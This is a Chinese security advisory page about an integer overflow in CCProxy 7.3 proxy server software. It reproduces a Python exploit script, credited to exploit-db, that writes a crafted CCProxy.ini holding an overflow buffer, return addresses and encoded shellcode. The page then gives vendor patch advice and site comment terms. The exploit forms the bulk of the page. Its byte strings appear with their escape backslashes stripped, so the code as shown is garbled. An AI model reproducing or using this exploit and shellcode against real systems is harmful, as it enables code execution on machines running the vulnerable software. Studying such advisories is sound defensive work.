发布日期:2014-01-08
更新日期:2014-01-12受影响系统:
CCProxy CCProxy 7.3
描述:
--------------------------------------------------------------------------------
CCProxy是国产代理服务器软件。CCProxy在实现上存在整数溢出安全漏洞,成功利用后可导致未授权操作。<*来源:Mr.XHat
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.exploit-db.com/exploits/30783/#!/usr/bin/env python# Exploit Title: CCProxy v7.3 Integer Overflow Exploit
# Date: 2013/03/22
# Author: Mr.XHat
# E-Mail: Mr.XHat {AT} GMail.com
# Vendor Homepage: http://www.youngzsoft.net/
# Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe
# Version: Prior To 7.3
# Discovered By: Mr.XHat
# Tested On: WinXP SP3 ENhdr = "[System]"
hdr += "x0dx0a"
hdr += "Ver=7.3"
hdr += "x0dx0a"
hdr += "Language="# EAX: 0x41414131
buf = "x41" * 1028
gdt1 = "x04xB4x12x00"
pad1 = "x41" * 4
gdt2 = "xF4xB3x12x00"
pad2 = "x41" * 12
gdt3 = "x04xB4x12x00"sc = (
# Avoid: "x00xffxf5"
"x6ax32x59xd9xeexd9x74x24xf4x5bx81x73x13xba" +
"xb3x5cxb6x83xebxfcxe2xf4x46x5bxd5xb6xbaxb3" +
"x3cx3fx5fx82x8exd2x31xe1x6cx3dxe8xbfxd7xe4" +
"xaex38x2ex9exb5x04x16x90x8bx4cx6dx76x16x8f" +
"x3dxcaxb8x9fx7cx77x75xbex5dx71x58x43x0exe1" +
"x31xe1x4cx3dxf8x8fx5dx66x31xf3x24x33x7axc7" +
"x16xb7x6axe3xd7xfexa2x38x04x96xbbx60xbfx8a" +
"xf3x38x68x3dxbbx65x6dx49x8bx73xf0x77x75xbe" +
"x5dx71x82x53x29x42xb9xcexa4x8dxc7x97x29x54" +
"xe2x38x04x92xbbx60x3ax3dxb6xf8xd7xeexa6xb2" +
"x8fx3dxbex38x5dx66x33xf7x78x92xe1xe8x3dxef" +
"xe0xe2xa3x56xe2xecx06x3dxa8x58xdaxebxd0xb2" +
"xd1x33x03xb3x5cxb6xeaxdbx6dx3dxd5x34xa3x63" +
"x01x43xe9x14xecxdbxfax23x07x2exa3x63x86xb5" +
"x20xbcx3ax48xbcxc3xbfx08x1bxa5xc8xdcx36xb6" +
"xe9x4cx89xd5xdbxdfx3fx98xdfxcbx39xb6"
)exp = hdr+buf+gdt1+pad1+gdt2+pad2+gdt3+sc
file = open("CCProxy.ini", "w")
file.write(exp)
file.close()建议:
--------------------------------------------------------------------------------
厂商补丁:CCProxy
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.ccproxy.com/Nisuta NS-WIR150/NS-WIR300无线路由器管理Web接口访问绕过漏洞WordPress Keyring插件OAuth示例页跨站脚本漏洞相关资讯 CCProxy 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站